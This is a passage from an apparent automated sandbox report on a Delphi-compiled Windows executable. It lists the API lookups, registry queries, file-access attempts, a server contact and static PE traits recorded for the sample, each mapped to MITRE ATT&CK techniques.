\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter WSPStartup (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter WSHOpenSocket (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter WSHOpenSocket2 (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter WSHJoinLeaf (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter WSHNotify (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter WSHGetSocketInformation (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter WSHSetSocketInformation (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter WSHGetSockaddrType (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter WSHGetWildcardSockaddr (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter WSHGetBroadcastSockaddr (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter WSHAddressToString (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter WSHStringToAddress (UID: 00000000-00004928)\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"GetProcAddress\" with a parameter WSHIoctl (UID: 00000000-00004928)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" was detected as \"Embarcadero Delphi\" and name: \"Compiler\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" was detected as \"Turbo Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-124", "relevance": 3, "name": "PE file has a big virtual size section", "description": "Virtual size of \".text\" is \"0x1f5524\" greater than 0x100000\n Virtual size of \".rsrc\" is \"0x5262a0\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:55377\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has an executable section named \".text\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has an executable section named \".itext\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".text\" is \"0x1f5600\" greater than 0x100000\n Raw size of \".rsrc\" is \"0x526400\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has an writable section named \".data\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has an writable section named \".bss\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has an writable section named \".idata\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has an writable section named \".didata\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has an writable section named \".tls\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Pattern Matching", "identifier": "yara-103", "type": 13, "relevance": 5, "name": "YARA signature match - AES encryption", "description": "YARA signature for AES encryption matched on process \"00000000-00004928\"", "origin": "YARA Signature", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" was detected as \"Borland Delphi 4.0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\version.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\SspiCli.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\UxTheme.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\samcli.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\MSACM32.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\sfc.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\sfc_os.DLL\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\MPR.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\dxgi.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\bcrypt.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\shcore.DLL\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shcore.DLL\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\Windows\\system\\shcore.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" reads file \"c:\\windows\\system32\\ntdll.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\APPCOMPATFLAGS\"; Key: \"\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\winspool.drv\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe.Local\\\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe.Manifest\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\WINSPOOL.DRV\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\66BC909510335BFC70704E47B4D8E23119A39582EA10862477263D53B8F64517.EXE.LOCAL\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to access non-existent file \"C:\\66BC909510335BFC70704E47B4D8E23119A39582EA10862477263D53B8F64517.EXE.MANIFEST\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\winspool.drv\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\Windows\\system32\\winspool.drv\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe.Local\\\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\\comctl32.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\version.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\Windows\\system32\\version.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\Windows\\AppPatch\\AcGenral.DLL\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\SspiCli.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\Windows\\system32\\SspiCli.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\UxTheme.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\Windows\\system32\\UxTheme.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\WINMM.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\Windows\\system32\\WINMM.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\samcli.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\Windows\\system32\\samcli.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\MSACM32.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\Windows\\system32\\MSACM32.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\sfc.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\Windows\\system32\\sfc.dll\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\sfc_os.DLL\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" trying to touch file \"C:\\Windows\\system32\\sfc_os.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\APPCOMPATFLAGS\"; Key: \"SHOWDEBUGINFO\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\WINDOWS FILE PROTECTION\"; Key: \"KNOWNDLLLIST\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"66BC909510335BFC70704E47B4D8E23119A39582EA10862477263D53B8F64517\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: 